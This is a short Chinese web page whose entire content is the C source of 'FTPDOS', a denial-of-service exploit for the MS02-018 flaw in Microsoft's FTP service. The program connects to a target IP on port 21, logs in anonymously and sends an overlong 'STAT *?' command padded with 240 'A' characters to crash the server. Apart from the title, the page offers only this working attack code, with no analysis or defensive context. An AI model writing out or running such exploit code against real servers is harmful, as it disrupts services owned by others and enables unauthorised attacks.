MS02-018中的FTP拒绝服务漏洞利用程序

/ns/wz/comp/data/20020819052343.htm

////////////////////////////////////////////////////////////
//             
// FTPDOS by refdom
//
// Author: Refdom.
// Email: refdom@263.net
// HomePage: www.opengram.com
// Comment: MSO2-018
//
////////////////////////////////////////////////////////////

#include "stdafx.h"
#include <stdio.h>
#include <winsock2.h>

#pragma comment (lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
WSADATA WSAData;
SOCKET sock = INVALID_SOCKET;
SOCKADDR_IN addr_in;
int nRetCode;
char szUser[] = "USER anonymous\r\n";
char szPassword[] = "PASS bill@microsoft.com\r\n";
char *pBuffer, *pExploit;
int nBufferSize = 260;


pBuffer = (char*) malloc(nBufferSize);
ZeroMemory(pBuffer, nBufferSize);
pExploit = (char*) malloc(241);
ZeroMemory(pExploit, 241);
FillMemory(pExploit, 240, 'A');
sprintf(pBuffer, "STAT *?%s\r\n", pExploit);

if (argc < 2)
{
printf ("Enter targetip!\n");
return 0;
}
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
{
printf ("WSAStartup error!\n");
return 0;
}

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (INVALID_SOCKET == sock)
{
printf ("socket error!\n");
goto Exit0;
}

addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(21);
addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);

nRetCode = connect(sock, (LPSOCKADDR)&addr_in, sizeof(addr_in));
if ( SOCKET_ERROR == nRetCode )
{
printf ("connect error!\n");
goto Exit0;
}
printf ("Dos Starting...\n");
nRetCode = send(sock, szUser, sizeof(szUser), 0);
if (SOCKET_ERROR == nRetCode)
{
printf ("send user error!\n");
goto Exit0;
}
Sleep(1000);

nRetCode = send(sock, szPassword, sizeof(szPassword), 0);
if (SOCKET_ERROR == nRetCode)
{
printf ("send password error!\n");
goto Exit0;
}
Sleep(1000);

nRetCode = send(sock, pBuffer, nBufferSize, 0);
if (SOCKET_ERROR == nRetCode)
{
printf ("send exploit error!\n");
goto Exit0;
}

Sleep(2000);
printf ("Dos End.\n");

Exit0:

if (sock != INVALID_SOCKET)
{
closesocket(sock);
}

free(pBuffer);
free(pExploit);

WSACleanup();
return 0;
}